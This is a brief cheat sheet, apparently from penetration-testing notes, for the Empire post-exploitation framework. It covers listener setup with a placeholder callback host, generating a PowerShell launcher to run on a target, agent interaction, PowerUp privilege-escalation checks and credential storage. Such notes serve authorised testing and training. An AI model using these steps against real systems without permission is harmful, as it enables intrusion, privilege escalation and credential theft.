Empire
Empire is a PowerShell and Python post-exploitation agent. GitHub - EmpireProject/Empire
Setup
Reset db
setup/reset.shSetup listener
listeners
uselistener http
info
set Host http://<ip>:<port>
set Port <port>
executeGenerate shellcode
launcher powershell-> Paste output into file and execute on target
Interact with agent
back
back
interact <agent-id>
searchmodule PowerUp
usemodule privesc/powerup/allcheck
executeStore credentials
Or use stored creds
Last updated